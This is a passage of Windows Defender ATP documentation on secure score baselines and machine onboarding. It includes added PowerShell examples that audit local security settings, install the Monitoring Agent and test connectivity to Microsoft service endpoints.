This recommendation is displayed when Windows Defender Antivirus is not properly configured to
report its health state. For more information on fixing the reporting, see Configure and validate network
connections.
Turn on antivirus
Update antivirus Security intelligence
Turn on real-time protection
Turn on PUA protection
For more information, see Configure Windows Defender Antivirus.
OS security updates optimization
This tile shows you the exact number of machines that require the latest security updates. It also shows machines
that are running on the latest Windows Insider preview build and serves as a reminder to ensure that users
run the latest builds.

IMPORTANT
This feature is available for machines on Windows 10, version 1607 or later.

You can take the following actions to increase the overall security score of your organization:
Install the latest security updates
Fix sensor data collection
The Windows Defender ATP service relies on sensor data collection to determine the security state of a
machine. The service will not be able to determine the security state of machines that are not reporting
sensor data properly. Therefore, it's important to ensure that sensor data collection is working properly.
For more information, see Fix unhealthy sensors.
For more information, see Windows Update Troubleshooter.
Windows Defender Exploit Guard (Windows Defender EG) optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on machines so that the minimum baseline
configuration setting for Windows Defender EG is fulfilled. When endpoints are configured according to the
baseline you'll be able to see Windows Defender EG events on the Windows Defender ATP Machine timeline.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.

Minimum baseline configuration setting for Windows Defender EG:
Machines are considered "well configured" for Windows Defender EG if the following requirements are met:
System level protection settings are configured correctly
Attack Surface Reduction rules are configured correctly
Controlled Folder Access setting is configured correctly
System level protection:

The following system level configuration settings must be set to On or Force On:
1. Control Flow Guard
2. Data Execution Prevention (DEP)
3. Randomize memory allocations (Bottom-up ASLR)
4. Validate exception chains (SEHOP)
5. Validate heap integrity

NOTE
The setting Force randomization for images (Mandatory ASLR) is currently excluded from the baseline. Consider
configuring Force randomization for images (Mandatory ASLR) to On or Force On for better protection.

Attack Surface Reduction (ASR) rules:

The following ASR rules must be configured to Block mode:

RULE DESCRIPTION | GUID
Block executable content from email client and webmail | BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block Office applications from creating child processes | D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block Office applications from creating executable content | 3B576869-A4EC-4529-8536-B80A7769E899
Impede JavaScript and VBScript to launch executables | D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts | 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 imports from Macro code in Office | 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B

NOTE
The setting Block Office applications from injecting into other processes with GUID
75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 is excluded from the baseline. Consider enabling this rule in Audit or Block
mode for better protection.

Controlled Folder Access

The Controlled Folder Access setting must be configured to Audit mode or Enabled.

NOTE
Audit mode allows you to see audit events in the Windows Defender ATP Machine timeline; however, it does not block
suspicious applications. Consider enabling Controlled Folder Access for better protection.

Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Turn on all system-level Exploit Protection settings
Set all ASR rules to enabled or audit mode
Turn on Controlled Folder Access
Turn on Windows Defender Antivirus on compatible machines
For more information, see Windows Defender Exploit Guard.
Windows Defender Application Guard (Windows Defender AG) optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for Windows Defender AG is fulfilled. When endpoints are configured according to the
baseline you'll be able to see Windows Defender AG events on the Windows Defender ATP Machine timeline.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.

Minimum baseline configuration setting for Windows Defender AG:
Machines are considered "well configured" for Windows Defender AG if the following requirements are met:
Hardware and software prerequisites are met
Windows Defender AG is turned on for compatible machines
Managed mode is turned on
Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Ensure hardware and software prerequisites are met

NOTE
This improvement item does not contribute to the security score in itself because it's not a prerequisite for Windows
Defender AG. It gives an indication of a potential reason why Windows Defender AG is not turned on.

Turn on Windows Defender AG on compatible machines
Turn on managed mode
For more information, see Windows Defender Application Guard overview.
Windows Defender SmartScreen optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for Windows Defender SmartScreen is fulfilled.

WARNING
Data collected by Windows Defender SmartScreen might be stored and processed outside of the storage location you have
selected for your Windows Defender ATP data.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.

Minimum baseline configuration setting for Windows Defender SmartScreen:
The following settings must be configured as follows:
Check apps and files: Warn or Block
SmartScreen for Microsoft Edge: Warn or Block
SmartScreen for Microsoft store apps: Warn or Off
You can take the following actions to increase the overall security score of your organization:
Set Check apps and files to Warn or Block
Set SmartScreen for Microsoft Edge to Warn or Block
Set SmartScreen for Microsoft store apps to Warn or Off
For more information, see Windows Defender SmartScreen.
Windows Defender Firewall optimization
For a machine to be considered "well configured", Windows Defender Firewall must be turned on and enabled for
all profiles, with inbound connections blocked by default. This tile shows you a specific list of actions you must
apply on endpoints so that the minimum baseline configuration setting for Windows Defender Firewall is fulfilled.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.

Minimum baseline configuration setting for Windows Defender Firewall:
Windows Defender Firewall is turned on for all network connections
Secure domain profile by enabling Windows Defender Firewall and ensure that Inbound connections is set to Blocked
Secure private profile by enabling Windows Defender Firewall and ensure that Inbound connections is set to Blocked
Secure public profile by enabling Windows Defender Firewall and ensure that Inbound connections is set to Blocked
For more information on Windows Defender Firewall settings, see Planning settings for a basic firewall policy.

NOTE
If Windows Defender Firewall is not your primary firewall, consider excluding it from the security score calculations and make
sure that your third-party firewall is configured securely.

Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Turn on firewall
Secure domain profile
Secure private profile
Secure public profile
Verify secure configuration of third-party firewall
Fix sensor data collection
The Windows Defender ATP service relies on sensor data collection to determine the security state of a
machine. The service will not be able to determine the security state of machines that are not reporting
sensor data properly. Therefore, it's important to ensure that sensor data collection is working properly.
For more information, see Fix unhealthy sensors.
For more information, see Windows Defender Firewall with Advanced Security.
BitLocker optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for BitLocker is fulfilled.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1803 or later.

Minimum baseline configuration setting for BitLocker:
Ensure all supported drives are encrypted
Ensure that protection is resumed on all drives where it was suspended
Ensure that drives are compatible
Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Encrypt all supported drives
Resume protection on all drives
Ensure drive compatibility
Fix sensor data collection
The Windows Defender ATP service relies on sensor data collection to determine the security state of a
machine. The service will not be able to determine the security state of machines that are not reporting
sensor data properly. Therefore, it's important to ensure that sensor data collection is working properly.
For more information, see Fix unhealthy sensors.
For more information, see BitLocker.
Windows Defender Credential Guard optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for Windows Defender Credential Guard is fulfilled.

IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.

Minimum baseline configuration setting for Windows Defender Credential Guard:
Machines are considered "well configured" for Windows Defender Credential Guard if the following requirements
are met:
Hardware and software prerequisites are met
Windows Defender Credential Guard is turned on for compatible machines
Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Ensure hardware and software prerequisites are met
Turn on Credential Guard
Fix sensor data collection
The Windows Defender ATP service relies on sensor data collection to determine the security state of a
machine. The service will not be able to determine the security state of machines that are not reporting
sensor data properly. Therefore, it's important to ensure that sensor data collection is working properly.
For more information, see Fix unhealthy sensors.
For more information, see Manage Windows Defender Credential Guard.
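The following script, added here as an example and not Microsoft's own code, audits the local machine against the baselines described in this topic (EDR sensor, Windows Defender AV, the Exploit Guard system-level mitigations, the six required ASR rules, Controlled Folder Access, the three firewall profiles and Credential Guard) and returns one pass/fail row per check. Assumptions of mine: the Sense service name for the sensor, the property names exposed by Get-ProcessMitigation -System, a one-day freshness limit for Security intelligence, and the Win32_DeviceGuard class for Credential Guard state; BitLocker, Application Guard and SmartScreen are not covered.

```powershell
#Requires -RunAsAdministrator
# Added example, not Microsoft's code: audit the local machine against the Secure
# score baselines in this topic and return one pass/fail row per check.
# Assumptions: 'Sense' is the Windows Defender ATP sensor service; property names of
# Get-ProcessMitigation -System (ProcessMitigations module); a one-day limit for
# "Security intelligence is up to date"; Win32_DeviceGuard reports Credential Guard.

# ASR rules the Exploit Guard baseline requires in Block mode (GUIDs from this topic).
$RequiredAsrRules = @{
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Impede JavaScript and VBScript to launch executables'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 imports from Macro code in Office'
}

function New-Check([string]$Control, [string]$Name, [bool]$Pass, [string]$Detail) {
    [pscustomobject]@{ Control = $Control; Check = $Name; Pass = $Pass; Detail = $Detail }
}

function Test-SecureScoreBaseline {
    $r = New-Object System.Collections.Generic.List[object]

    # EDR: the sensor service must be running.
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $r.Add((New-Check 'EDR' 'Sensor is on' ([bool]$sense -and $sense.Status -eq 'Running') "Sense: $($sense.Status)"))

    # Windows Defender AV baseline.
    $st   = Get-MpComputerStatus
    $pref = Get-MpPreference
    $r.Add((New-Check 'AV' 'Antivirus is turned on'     $st.AntivirusEnabled          "AntivirusEnabled=$($st.AntivirusEnabled)"))
    $r.Add((New-Check 'AV' 'Real-time protection is on' $st.RealTimeProtectionEnabled "RealTimeProtectionEnabled=$($st.RealTimeProtectionEnabled)"))
    $r.Add((New-Check 'AV' 'Security intelligence is up to date' ($st.AntivirusSignatureAge -le 1) "signature age: $($st.AntivirusSignatureAge) day(s)"))
    $r.Add((New-Check 'AV' 'PUA protection is enabled'  ($pref.PUAProtection -eq 1)   "PUAProtection=$($pref.PUAProtection)"))

    # Exploit Guard: system-level mitigations must be On or Force On (reported as 'ON').
    $m = Get-ProcessMitigation -System
    $mitigations = [ordered]@{
        'Control Flow Guard'                = $m.CFG.Enable
        'Data Execution Prevention (DEP)'   = $m.DEP.Enable
        'Bottom-up ASLR'                    = $m.ASLR.BottomUp
        'Validate exception chains (SEHOP)' = $m.SEHOP.Enable
        'Validate heap integrity'           = $m.Heap.TerminateOnError
    }
    foreach ($k in $mitigations.Keys) {
        $r.Add((New-Check 'EG' $k ("$($mitigations[$k])" -eq 'ON') "$($mitigations[$k])"))
    }

    # Exploit Guard: ASR rules. Ids and Actions are parallel arrays; 1 = Block, 2 = Audit, 0 = Off.
    $ids  = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    $asr  = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $asr[$ids[$i].ToUpper()] = $acts[$i] }
    foreach ($guid in $RequiredAsrRules.Keys) {
        $action = if ($asr.ContainsKey($guid)) { $asr[$guid] } else { 'not configured' }
        $r.Add((New-Check 'EG' "ASR: $($RequiredAsrRules[$guid])" ($action -eq 1) "action=$action"))
    }

    # Exploit Guard: Controlled Folder Access must be Enabled (1) or Audit (2).
    $cfa = $pref.EnableControlledFolderAccess
    $r.Add((New-Check 'EG' 'Controlled Folder Access' ($cfa -in 1, 2) "EnableControlledFolderAccess=$cfa"))

    # Firewall: every profile on, with inbound connections blocked by default.
    foreach ($p in Get-NetFirewallProfile) {
        $ok = ($p.Enabled -eq 'True') -and ($p.DefaultInboundAction -eq 'Block')
        $r.Add((New-Check 'Firewall' "Secure $($p.Name) profile" $ok "Enabled=$($p.Enabled) Inbound=$($p.DefaultInboundAction)"))
    }

    # Credential Guard: SecurityServicesRunning contains 1 when it is running.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard
    $r.Add((New-Check 'CredGuard' 'Credential Guard is turned on' (1 -in @($dg.SecurityServicesRunning)) "running: $($dg.SecurityServicesRunning -join ',')"))

    return $r
}

$report = Test-SecureScoreBaseline
$report | Format-Table Control, Check, Pass, Detail -AutoSize
$failed = @($report | Where-Object { -not $_.Pass }).Count
Write-Host "$failed of $($report.Count) baseline checks failed on $env:COMPUTERNAME"
```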
Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Overview of Secure score
Onboard machines to the Windows Defender ATP service
4/22/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You need to turn on the sensor to give visibility within Windows Defender ATP.
For more information, see Onboard your Windows 10 machines to Windows Defender ATP.

IMPORTANT
Some information relates to prerelease product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Want to experience Windows Defender ATP? Sign up for a free trial.

Licensing requirements
Windows Defender Advanced Threat Protection requires one of the following Microsoft Volume Licensing offers:
Windows 10 Enterprise E5
Windows 10 Education E5
Microsoft 365 Enterprise E5 which includes Windows 10 Enterprise E5
For more information, see Windows 10 Licensing.

Hardware and software requirements
Supported Windows versions
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows 8.1 Enterprise
Windows 8.1 Pro
Windows 10, version 1607 or later:
Windows 10 Enterprise
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education
Windows Server:
Windows Server 2012 R2
Windows Server 2016
Windows Server 2016, version 1803
Windows Server 2019
Machines on your network must be running one of these editions.
The hardware requirements for Windows Defender ATP on machines are the same as those for the supported
editions.

NOTE
Machines that are running mobile versions of Windows are not supported.

Other supported operating systems
macOS
Linux

NOTE
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP for the
integration to work.

Network and data storage and configuration requirements
When you run the onboarding wizard for the first time, you must choose where your Windows Defender Advanced
Threat Protection-related information is stored: in the European Union, the United Kingdom, or the United States
datacenter.

NOTE
You cannot change your data storage location after the first-time setup.
Review the Windows Defender ATP data storage and privacy for more information on where and how Microsoft stores
your data.

Diagnostic data settings
You must ensure that the diagnostic data service is enabled on all the machines in your organization. By default,
this service is enabled, but it's good practice to check to ensure that you'll get sensor data from them.
Use the command line to check the Windows 10 diagnostic data service startup type:
1. Open an elevated command-line prompt on the machine:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

sc qc diagtrack

If the service is enabled, then the result should look like the following screenshot:
If the START_TYPE is not set to AUTO_START, then you'll need to set the service to automatically start.
Use the command line to set the Windows 10 diagnostic data service to automatically start:
1. Open an elevated command-line prompt on the endpoint:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

sc config diagtrack start=auto

3. A success message is displayed. Verify the change by entering the following command, and press Enter:

sc qc diagtrack

Internet connectivity
Internet connectivity on machines is required either directly or through proxy.
The Windows Defender ATP sensor can utilize a daily average bandwidth of 5 MB to communicate with the
Windows Defender ATP cloud service and report cyber data. One-off activities such as file uploads and
investigation package collection are not included in this daily average bandwidth.
For more information on additional proxy configuration settings, see Configure machine proxy and Internet
connectivity settings.
Before you onboard machines, the diagnostic data service must be enabled. The service is enabled by default in
Windows 10.

Windows Defender Antivirus configuration requirement
The Windows Defender ATP agent depends on the ability of Windows Defender Antivirus to scan files and provide
information about them.
You must configure Security intelligence updates on the Windows Defender ATP machines whether Windows
Defender Antivirus is the active antimalware or not. For more information, see Manage Windows Defender
Antivirus updates and apply baselines.
When Windows Defender Antivirus is not the active antimalware in your organization and you use the Windows
Defender ATP service, Windows Defender Antivirus goes into passive mode. If your organization has disabled
Windows Defender Antivirus through group policy or other methods, machines that are onboarded to Windows
Defender ATP must be excluded from this group policy.
If you are onboarding servers and Windows Defender Antivirus is not the active antimalware on your servers, you
shouldn't uninstall Windows Defender Antivirus. You'll need to configure it to run on passive mode. For more
information, see Onboard servers.
For more information, see Windows Defender Antivirus compatibility.

Windows Defender Antivirus Early Launch Antimalware (ELAM) driver is enabled
If you're running Windows Defender Antivirus as the primary antimalware product on your machines, the
Windows Defender ATP agent will successfully onboard.
If you're running a third-party antimalware client and use Mobile Device Management solutions or System Center
Configuration Manager (current branch) version 1606, you'll need to ensure that the Windows Defender Antivirus
ELAM driver is enabled. For more information, see Ensure that Windows Defender Antivirus is not disabled by
policy.

In this section
Onboard previous versions of Windows: Onboard Windows 7 and Windows 8.1 machines to Windows Defender ATP.
Onboard Windows 10 machines: You'll need to onboard machines for them to report to the Windows Defender ATP
service. Learn about the tools and methods you can use to configure machines in your enterprise.
Onboard servers: Onboard Windows Server 2012 R2 and Windows Server 2016 to Windows Defender ATP.
Onboard non-Windows machines: Windows Defender ATP provides a centralized security operations experience for
Windows as well as non-Windows platforms. You'll be able to see alerts from various supported operating
systems (OS) in Windows Defender Security Center and better protect your organization's network. This
experience relies on third-party security products' sensor data.
Run a detection test on a newly onboarded machine: Run a script on a newly onboarded machine to verify that it
is properly reporting to the Windows Defender ATP service.
Configure proxy and Internet settings: Enable communication with the Windows Defender ATP cloud service by
configuring the proxy and Internet connectivity settings.
Troubleshoot onboarding issues: Learn about resolving issues that might arise during onboarding.

Want to experience Windows Defender ATP? Sign up for a free trial.


Onboard previous versions of Windows
4/8/2019 • 3 minutes to read

Applies to:
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows 8.1 Pro
Windows 8.1 Enterprise
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Windows Defender ATP extends support to include down-level operating systems, providing advanced attack
detection and investigation capabilities on supported Windows versions.

IMPORTANT
This capability is currently in preview. You'll need to turn on the preview features to take advantage of this feature. For more
information, see Preview features.

To onboard down-level Windows client endpoints to Windows Defender ATP, you'll need to:
Configure and update System Center Endpoint Protection clients.
Install and configure Microsoft Monitoring Agent (MMA) to report sensor data to Windows Defender ATP as
instructed below.

TIP
After onboarding the machine, you can choose to run a detection test to verify that it is properly onboarded to the service.
For more information, see Run a detection test on a newly onboarded Windows Defender ATP endpoint.

Configure and update System Center Endpoint Protection clients


IMPORTANT
This step is required only if your organization uses System Center Endpoint Protection (SCEP).

Windows Defender ATP integrates with System Center Endpoint Protection to provide visibility into malware
detections and to stop an attack from propagating in your organization by banning potentially malicious files or
suspected malware.
The following steps are required to enable this integration:
Install the January 2017 anti-malware platform update for Endpoint Protection clients
Configure the SCEP client Cloud Protection Service membership to the Advanced setting
Configure your network to allow connections to the Windows Defender Antivirus cloud. For more information,
see Allow connections to the Windows Defender Antivirus cloud
Install and configure Microsoft Monitoring Agent (MMA) to report sensor data to Windows Defender ATP
Before you begin
Review the following details to verify minimum system requirements:
Install the February monthly update rollup

NOTE
Only applicable for Windows 7 SP1 Enterprise and Windows 7 SP1 Pro.

Install the Update for customer experience and diagnostic telemetry
Install either .NET Framework 4.5 (or later) or KB3154518

NOTE
Only applicable for Windows 7 SP1 Enterprise and Windows 7 SP1 Pro. Don't install .NET Framework 4.0.x, since it will
negate the above installation.

Meet the Azure Log Analytics agent minimum system requirements. For more information, see Collect data
from computers in your environment with Log Analytics.
1. Download the agent setup file: Windows 64-bit agent or Windows 32-bit agent.
2. Obtain the workspace ID:
In the Windows Defender ATP navigation pane, select Settings > Machine management >
Onboarding
Select Windows 7 SP1 and 8.1 as the operating system
Copy the workspace ID and workspace key
3. Using the Workspace ID and Workspace key choose any of the following installation methods to install the
agent:
Manually install the agent using setup
On the Agent Setup Options page, select Connect the agent to Azure Log Analytics (OMS)
Install the agent using command line and configure the agent using a script
4. If you're using a proxy to connect to the Internet see the Configure proxy settings section.
Once completed, you should see onboarded endpoints in the portal within an hour.
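
The command-line install and script-based configuration mentioned in step 3, carried through end to end, as an added example that is not part of the original page. It installs the agent silently, attaches it to the workspace from step 2, and reads the registration back through the agent's AgentConfigManager.MgmtSvcCfg COM interface. The installer path, workspace ID, workspace key and proxy URL are placeholders.

```powershell
# Added example, not from the original page: unattended Microsoft Monitoring Agent install on a
# Windows 7 SP1 / 8.1 endpoint that joins the Windows Defender ATP workspace in the same step, then
# a read-back of the agent's workspace registration through its AgentConfigManager.MgmtSvcCfg COM
# interface. Run elevated from Windows PowerShell 3.0 or later. The installer path, workspace ID,
# workspace key and proxy URL are placeholders to replace.
param(
    [string]$InstallerPath = 'C:\Temp\MMASetup-AMD64.exe',                # assumed download location
    [string]$WorkspaceId   = '00000000-0000-0000-0000-000000000000',     # from Settings > Machine management > Onboarding
    [string]$WorkspaceKey  = '<workspace key>',
    [string]$ProxyUrl      = ''                                          # e.g. 'http://proxy.corp.example:8080'; empty = direct
)

$extractDir = Join-Path $env:TEMP 'MMA'

# 1. The download is a self-extracting package: /c extracts only, /t: sets the target folder.
Start-Process -FilePath $InstallerPath -ArgumentList "/c /t:`"$extractDir`"" -Wait -NoNewWindow

# 2. Silent install that also attaches the agent to the workspace.
#    OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE=0 selects the Azure commercial cloud; NOAPM=1 skips the
#    .NET application performance monitoring component, which the sensor does not need.
$setupArgs = @(
    '/qn', 'NOAPM=1', 'ADD_OPINSIGHTS_WORKSPACE=1', 'OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE=0',
    "OPINSIGHTS_WORKSPACE_ID=`"$WorkspaceId`"",
    "OPINSIGHTS_WORKSPACE_KEY=`"$WorkspaceKey`"",
    'AcceptEndUserLicenseAgreement=1'
)
$setup = Start-Process -FilePath (Join-Path $extractDir 'setup.exe') -ArgumentList $setupArgs -Wait -PassThru -NoNewWindow
if ($setup.ExitCode -ne 0) { throw "MMA setup.exe exited with code $($setup.ExitCode)" }

# 3. Post-install configuration through the agent's COM object. SetProxyInfo exists only in agent
#    builds that support it, hence the Get-Member check; the empty strings are the user name and
#    password for an unauthenticated proxy.
$mma = New-Object -ComObject 'AgentConfigManager.MgmtSvcCfg'
if ($ProxyUrl) {
    if (-not ($mma | Get-Member -Name SetProxyInfo)) { throw 'This agent build has no SetProxyInfo; update the agent first.' }
    $mma.SetProxyInfo($ProxyUrl, '', '')
}
$joined = @($mma.GetCloudWorkspaces() | Where-Object { $_.workspaceId -eq $WorkspaceId })
if ($joined.Count -eq 0) {
    # Only needed if setup did not already attach the workspace (for example when step 2 was run without the OPINSIGHTS_* properties).
    $mma.AddCloudWorkspace($WorkspaceId, $WorkspaceKey)
    $mma.ReloadConfiguration()
}

# 4. Read back the registration. Registration with the workspace can take a few minutes after
#    install, so an initial not-connected status is not by itself a failure.
$mma.GetCloudWorkspaces() | Select-Object workspaceId, AgentId, ConnectionStatus, ConnectionStatusText
```

The workspace key is a credential: pass it from a secured deployment variable rather than hard-coding it in a script that is left on file shares, and rotate it from the portal if a copy leaks.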
Configure proxy and Internet connectivity settings
Each Windows endpoint must be able to connect to the Internet using HTTPS. This connection can be direct,
through a proxy, or through the OMS Gateway.
If a proxy or firewall blocks all traffic by default and allows only specific domains through, or if HTTPS
scanning (SSL inspection) is enabled, make sure the following URLs are allowed through (and exempted from
inspection) so that the agent can communicate with the Windows Defender ATP service:

AGENT RESOURCE                  PORT
*.oms.opinsights.azure.com      443
*.blob.core.windows.net         443
*.azure-automation.net          443
*.ods.opinsights.azure.com      443
winatp-gw-cus.microsoft.com     443
winatp-gw-eus.microsoft.com     443
winatp-gw-neu.microsoft.com     443
winatp-gw-weu.microsoft.com     443
winatp-gw-uks.microsoft.com     443
winatp-gw-ukw.microsoft.com     443
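
A way to verify the table above from the endpoint itself, as an added example that is not part of the original page: it opens TCP 443 to each gateway, completes a TLS handshake, and shows who issued the certificate the endpoint actually received, which is how HTTPS inspection reveals itself. The workspace ID is a placeholder; the wildcard entries in the table are reached as <workspaceId>.oms.opinsights.azure.com and <workspaceId>.ods.opinsights.azure.com. The issuer-name check at the end is a heuristic of this example, not a rule from the original page.

```powershell
# Added example, not from the original page: check from a Windows 7 / 8.1 endpoint that the Log
# Analytics and Windows Defender ATP gateways accept TCP 443 and complete a TLS handshake, and show
# who issued the certificate the endpoint actually received, which exposes HTTPS inspection.
# Run from Windows PowerShell 3.0 or later on .NET 4.5 (a prerequisite above anyway).
# The workspace ID is a placeholder.

$WorkspaceId = '00000000-0000-0000-0000-000000000000'

$endpoints = @(
    "$WorkspaceId.oms.opinsights.azure.com",
    "$WorkspaceId.ods.opinsights.azure.com",
    'winatp-gw-cus.microsoft.com', 'winatp-gw-eus.microsoft.com',
    'winatp-gw-neu.microsoft.com', 'winatp-gw-weu.microsoft.com',
    'winatp-gw-uks.microsoft.com', 'winatp-gw-ukw.microsoft.com'
)

function Test-AtpEndpoint {
    param([string]$HostName, [int]$Port = 443, [int]$TimeoutMs = 5000)

    $r = New-Object PSObject -Property @{ HostName = $HostName; TcpOpen = $false; TlsOk = $false; Issuer = ''; Error = '' }
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        # Direct TCP connect with a timeout. Through a mandatory proxy this fails, and the proxy
        # must instead be configured in the agent or the OMS Gateway used.
        $ar = $client.BeginConnect($HostName, $Port, $null, $null)
        if (-not $ar.AsyncWaitHandle.WaitOne($TimeoutMs)) { throw "connect timed out after $TimeoutMs ms" }
        $client.EndConnect($ar)
        $r.TcpOpen = $true

        # Accept any server certificate so its issuer can be inspected: this is a diagnostic, not a
        # trust decision, and the stream is discarded right after the handshake.
        $acceptAll = [System.Net.Security.RemoteCertificateValidationCallback]{ param($s, $c, $ch, $e) $true }
        $ssl = New-Object System.Net.Security.SslStream($client.GetStream(), $false, $acceptAll)
        $noClientCerts = New-Object System.Security.Cryptography.X509Certificates.X509CertificateCollection
        $ssl.AuthenticateAsClient($HostName, $noClientCerts, [System.Security.Authentication.SslProtocols]::Tls12, $false)
        $r.TlsOk  = $true
        $r.Issuer = $ssl.RemoteCertificate.Issuer
        $ssl.Dispose()
    } catch {
        $r.Error = $_.Exception.Message
    } finally {
        $client.Close()
    }
    $r
}

$report = $endpoints | ForEach-Object { Test-AtpEndpoint -HostName $_ }
$report | Format-Table HostName, TcpOpen, TlsOk, Issuer, Error -AutoSize

# Heuristic (an assumption of this example): Microsoft's public service certificates chain to
# Microsoft or DigiCert CAs. An issuer that is your own proxy or firewall CA means HTTPS
# inspection is active for that host and the host must be exempted.
$report | Where-Object { $_.TlsOk -and $_.Issuer -notmatch 'Microsoft|DigiCert' } |
    ForEach-Object { Write-Warning "$($_.HostName): certificate issued by '$($_.Issuer)'; check for HTTPS inspection" }
```

A host that shows TcpOpen = True but TlsOk = False with a handshake error is typically being intercepted by a device that only allows TLS 1.0/1.1 or that rejects the server name; a host that fails the TCP connect altogether is blocked at the firewall or requires the proxy.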

Offboard client endpoints


To offboard, you can uninstall the MMA agent from the endpoint or detach it from reporting to your Windows
Defender ATP workspace. After offboarding the agent, the endpoint will no longer send sensor data to Windows
Defender ATP.

Onboard Windows 10 machines
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Machines in your organization must be configured so that the Windows Defender ATP service can get sensor
data from them. There are various methods and deployment tools that you can use to configure the machines
in your organization.
The following deployment tools and methods are supported:
Group Policy
System Center Configuration Manager
Mobile Device Management (including Microsoft Intune)
Local script

In this section
Onboard Windows 10 machines using Group Policy: Use Group Policy to deploy the configuration package on
machines.
Onboard Windows 10 machines using System Center Configuration Manager: You can use either System Center
Configuration Manager (current branch) version 1606 or System Center Configuration Manager (current branch)
version 1602 or earlier to deploy the configuration package on machines.
Onboard Windows 10 machines using Mobile Device Management tools: Use Mobile Device Management tools or
Microsoft Intune to deploy the configuration package on machines.
Onboard Windows 10 machines using a local script: Learn how to use the local script to deploy the configuration
package on endpoints.
Onboard non-persistent virtual desktop infrastructure (VDI) machines: Learn how to use the configuration package
to configure VDI machines.

Onboard Windows 10 machines using Group Policy
4/8/2019 • 4 minutes to read

Applies to:
Group Policy
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
To use Group Policy (GP) updates to deploy the package, you must be on Windows Server 2008 R2 or later.

Onboard machines using Group Policy


1. Open the GP configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
downloaded from the service onboarding wizard. You can also get the package from Windows Defender
Security Center:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Group policy.
d. Click Download package and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machine.
You should have a folder called OptionalParamsPolicy and the file
WindowsDefenderATPOnboardingScript.cmd.
3. Open the Group Policy Management Console (GPMC), right-click the Group Policy Object (GPO) you
want to configure and click Edit.
4. In the Group Policy Management Editor, go to Computer configuration, then Preferences, and
then Control panel settings.
5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab. Choose the local SYSTEM user account under
Security options.
7. Select Run whether user is logged on or not and check the Run with highest privileges check box.
8. Go to the Actions tab and click New... Ensure that Start a program is selected in the Action field. Enter
the file name and location of the shared WindowsDefenderATPOnboardingScript.cmd file.
9. Click OK and close any open GPMC windows.
TIP
After onboarding the machine, you can choose to run a detection test to verify that the machine is properly onboarded
to the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.

Additional Windows Defender ATP configuration settings


For each machine, you can state whether samples can be collected from the machine when a request is made
through Windows Defender Security Center to submit a file for deep analysis.
You can use Group Policy (GP) to configure settings, such as settings for the sample sharing used in the deep
analysis feature.
Configure sample collection settings
1. On your GP management machine, copy the following files from the configuration package:
a. Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions
b. Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US
2. Open the Group Policy Management Console, right-click the GPO you want to configure and click Edit.
